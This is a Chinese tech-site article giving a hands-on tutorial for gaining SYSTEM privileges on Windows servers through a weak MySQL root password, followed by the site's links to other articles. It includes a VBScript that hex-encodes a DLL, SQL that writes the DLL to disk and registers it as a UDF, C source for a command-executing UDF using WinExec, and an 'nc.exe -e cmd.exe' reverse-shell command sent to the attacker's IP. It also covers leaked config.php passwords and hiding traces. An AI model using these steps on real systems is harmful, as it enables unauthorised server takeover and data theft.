mysql命令的用法 怎么用mysql弱口令得到webshell?
很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!
首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。
思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦!
下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法):
set @a = concat('',0x0123abc1312389…..);
set @a = concat(@a,0x4658978abc545e……);
………………….
create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob
insert into Mix values("");update Mix set data = @a;//@a插入表Mix
select data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件
前两句很熟悉把,这个就是我们以前注入的时候,绕过’的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。
后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:
fp=wscript.arguments(0
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)
.write "set @a = concat('',0x"
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write ");" vbcrlf "set @a = concat(@a,0x"
next
end with
好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set @a = concat('',0x”删除了,加上建表,插值得那三句代码即可!
脚本生成了,如何上传?先登陆mysql服务器:
C:\>mysql –u root –h hostip –p
Mysql>use mysql; //先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库
Mysql>\. E:\*.dll.txt; //这儿就是你生成的mysql脚本
按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了!
下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧!
先用mix.dll:
登陆mysql,输入命令:
Mysql> \. e:\mix.dll.txt;
Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';
//这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令!
Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端口
过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1:
这个的确不错,通过反弹得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select Mixconnect('你的ip','8080');”的时候,对方的mysql会当掉!报错,然后服务停止!
所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。
再用my_udf.dll:
Mysql>\. C:\my_udf.dll.txt
Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';
//同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数
Mysql> select my_udfdoor('’); //这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数
好了,现在你可以不用关这个shell了,我们再开一个cmd,使用:
D:\>nc hostip 3306
*
4.0.*-nt x$Eo~MCG f**k //看到这个后,输入“f**k” ,他是my_udfdoor默认密码,自己无法更改
过一会儿,你就有了系统权限的shell了,
由于他是hook recv版,所以穿墙的能力很强,我是在上一个mix.dll反弹失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select my_udfdoor('’);”后),不管你是否连接,只要执行了:
Mysql>drop function my_udfdoor; 后,mysql也汇报错,然后挂掉,
所以,你使用这个dll文件无法删除你的痕迹!
最后,然我们自己写一个自定义的dll文件。看能不能解决问题。
我们仅仅使用mysql 得udf的示例作模版即可!看他的示例:
#include
#include
#include
extern "C" {
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
char *error);
// 兼容C
}
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
char *error)
{
char * me = "my name";
return me;
// 调用此UDF将返回 my name
}
十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了:
下面是我的一个哥们Crackme是修改的:
#include
#include
#include "mysql.h"
extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改
__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改!
{
char me[256] = {0};
if (args->arg_count == 1){
strncpy(me,args->args[0],args->lengths[0]);
me[args->lengths[0]]='\0';
WinExec(me,SW_HIDE); //就是用它来执行任意命令
}else
strcpy(me,"do nonthing.\n");
return me;
}
好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把!
看操作:
Mysql>\. C:\sysudf.dll.txt
Mysql>Create function sys_name returns string soname 'C:\\windows\\sysudf.dll';
Mysql>\. Nc.exe.txt //把nc.exe也上传上去
Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080');
//sys_name参数只有一个,参数指定要执行的系统命令
好,看看在Win2003中的一个反弹shell了,
当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop function sys_name;”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。
上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。
好了,从脚本得编写使用到dll文件编写使用,说了这么多,现在大家应该都会了吧?题目说的是弱口令得到系统权限,但是如果你在注入等其他过程中,爆出了config.php中的mysql密码,不也是可以使用的吗?这样我们岂不是也找到继Serv-u后又一大提权方法了吗?
打开电脑的六种方法 原来打电话也能开计算机
如果有人问:“你会开计算机吗?”你肯定会说:“不就是按一下 Power 键吗?这有谁不会?开机,不只从这里开始如果再问你:“除了按 Power 键开机外,你还会用其他的方法开机吗?”你肯定会一愣。开机六种玩
详情2018-01-12 08:50:40责编:llp 来源:驱动管家网络安全密钥 怎么获取密钥生成算法?
从拷贝保护产品中剥取(ripping)算法通常是创建密钥生成程序的一种简单而行之有效的方法。其思路非常简单:定位受保护程序内计算合法序列号的函数(可能不止一个函数),并将它(们)移植到你密钥生成程序中。这
详情2018-01-13 17:21:44责编:llp 来源:驱动管家什么是dns欺骗攻击?dns欺骗攻击怎么防范?
你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址,但是打开的并不是你想要去的网站。它可能是114的查询页面,可能是一个广告页面,更可能是一个刷流量的页面,甚至是一个挂马的网站。如果你遇到了上述情况话,那么极有可能你遭遇了DNS欺骗。
详情2018-01-13 12:29:36责编:llp 来源:驱动管家漏洞扫描工具有哪些?这里有一堆常见的漏洞扫描工具
网站漏洞扫描工具Shadow Security Scanner v 网络入侵机_V2 0 波尔远程控制V6 32 VIP破解版superscan4 0扫描器 HttpsMimTools nohackasp木马生成器拿站和思路 Oracle_专用注射器 远程控制软件ntshell
详情2018-01-15 18:03:47责编:llp 来源:驱动管家关闭135 445端口该怎么做?关闭135 445端口的步骤
135端口主要用于使用RPC(RemoteProcedureCall,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。端口说明:135端口主要用于使用RPC(RemoteProcedureCall,远程过程调用)协议并提供DCOM(分布式组件
详情2018-01-14 14:03:30责编:llp 来源:驱动管家rar加密文件怎么破解?rar加密文件破解的步骤
对于一些安全意识比较强的人来说,一般都会对文件进行加密,例如使用rar自带的加密功能进行加密,如果偶然获取了这种rar加密文件,人的好奇心肯定会促使获取资料的人去打开这些加密文件。当然网上也有很多提供资
详情2018-01-15 18:03:40责编:llp 来源:驱动管家手机使用技巧 智能手机怎么用?
1。用智能手机工作室1 1版备份联系人、短信、通话记录等, 下载刷机相关文件(刷机工具, ROM, Radio, 格式化ExtROM工具Repart_DOC exe), 同步软件ActiveSync要用最新版4 0以上的。2。确认下载的ROM文件(n
详情2018-01-04 11:50:01责编:llp 来源:驱动管家mysql学习 学习恢复mysql密码的方法
因为MySQL密码存储于数据库mysql中的user表中所以只需要将我windows 2003下的MySQL中的user表拷贝过来覆盖掉就行了在c: mysql data mysql (linux 则一般在 var lib mysql mysql )目录下有三个user表相关文件use
详情2018-01-15 11:08:44责编:llp 来源:驱动管家加密工具gpg是怎么下载安装使用的?
先说说GPG的获得吧,GPG是开放源代码的软件,是完全免费的,大家可
详情2018-01-04 09:36:39责编:llp 来源:驱动管家什么是rsa算法?rsa算法的发展历史
它是第一个既能用于数据加密也能用于数字签名的算法。它易于理解和操作,也很流行。算法的名字以发明者的名字命名:Ron Rivest, Adi Shamir 和Leonard Adleman。但RSA的安全性一直未能得到理论上的证明。它
详情2018-01-06 09:20:19责编:llp 来源:驱动管家
- 天猫优惠券的使用方法是什么?怎么用天猫优惠券?
- ae软件卸载有残留怎么办?怎么清理卸载ae软件的残留文件?
- 笔记本可以换显卡吗?笔记本换显卡的办法是什么
- 笔记本连接投影仪怎样连接最简单
- 电脑系统总是自动更新图标怎么关闭自动更新
- 这个u盘格式化工具竟然能修复坏掉的工具
- itunes怎么设置铃声?itunes设置铃声的步骤是什么?
- 魅族mx6发布会直播地址 魅族mx6发布会直播在哪里看?
- 网页视频无法播放是怎么回事?网页视频播放变成两半怎么解决?
- 默认网关在哪儿设置?默认网关是什么东西?
- 计算机中毒怎么处理?计算机中毒的紧急处理措施
- 网马是什么?怎么保护网马的代码?
- qq圈子是什么?qq圈子是用来干什么的?
- 录屏软件是干嘛的?录屏软件怎么用?
- 机箱电源常见的故障问题都有哪些
- 震旦复印机在发生故障的时候这样维修最简单
- 《绝地求生》武器装备怎么选择?新手可以这么搭配冲锋枪
- 《绝地求生》这样玩才够溜!实用跳伞、战斗与操作技巧详解
- 《绝地求生》弹药怎么使用?烟雾弹、燃烧瓶与闪光弹使用技巧
- 用ie浏览器打开浏览器打开网页没声音如何解决呢